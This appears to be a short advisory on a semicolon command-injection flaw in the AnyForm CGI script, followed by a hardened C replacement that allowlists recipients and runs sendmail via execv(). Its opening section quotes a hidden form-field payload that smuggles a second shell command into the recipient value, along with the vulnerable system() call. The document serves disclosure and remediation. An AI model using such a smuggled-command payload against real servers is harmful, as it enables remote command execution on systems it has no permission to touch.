Anyform CGI Semicolon Vulnerability
Exploit as taken from the original post on this issue:
To exploit, create a form with a hidden field something like this:
<input type="hidden" name="AnyFormTo" value="email@example.com;command-to-execute
with whatever arguments;/usr/lib/sendmail -t firstname.lastname@example.org ">
Then submit the form to the "AnyForm" CGI on the server to be attacked.
The value of this parameter is passed to this code:
SystemCommand="/usr/lib/sendmail -t " + AnyFormTo + " <" + CombinedFileName;
Since system invokes a shell, the semicolons are treated as command
delimiters and anything can be inserted.
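
A hardened counterpart to the command construction quoted above, as an added example that is not AnyForm's own code: the recipient is checked against a conservative character allowlist and sendmail is started with execv(), so no shell ever parses the value. The function names, the allowlist and the 254-character limit are assumptions made for this illustration; the sendmail path is the one shown above.

```c
/* Added example: names, allowlist and length limit are illustrative assumptions. */
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Accept only a conservative subset of address characters: no shell
 * metacharacters, no whitespace, exactly one '@', and no leading '-'
 * (which sendmail would parse as a command-line option). */
int recipient_is_safe(const char *addr)
{
    static const char allowed[] =
        "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789.-_+@";
    size_t len = strlen(addr);
    const char *at = strchr(addr, '@');

    if (len == 0 || len > 254 || addr[0] == '-')
        return 0;
    if (strspn(addr, allowed) != len)
        return 0;
    /* exactly one '@', with text on both sides of it */
    return at != NULL && at != addr && at[1] != '\0' &&
           strchr(at + 1, '@') == NULL;
}

/* Run sendmail with the message file on stdin. execv() hands argv to the
 * program directly, so the recipient is one argument and never shell text.
 * Returns sendmail's exit status, or -1 on rejection or error. */
int send_form_mail(const char *recipient, const char *message_path)
{
    int status;
    pid_t pid;

    if (!recipient_is_safe(recipient))
        return -1;                       /* rejected before any process starts */
    if ((pid = fork()) < 0)
        return -1;
    if (pid == 0) {                      /* child */
        char *argv[] = { "sendmail", "-t", (char *)recipient, NULL };
        int fd = open(message_path, O_RDONLY);
        if (fd < 0 || dup2(fd, STDIN_FILENO) < 0)
            _exit(127);
        execv("/usr/lib/sendmail", argv);
        _exit(127);                      /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```

Either measure alone closes the semicolon issue; using both also blocks option injection through a recipient that begins with `-`.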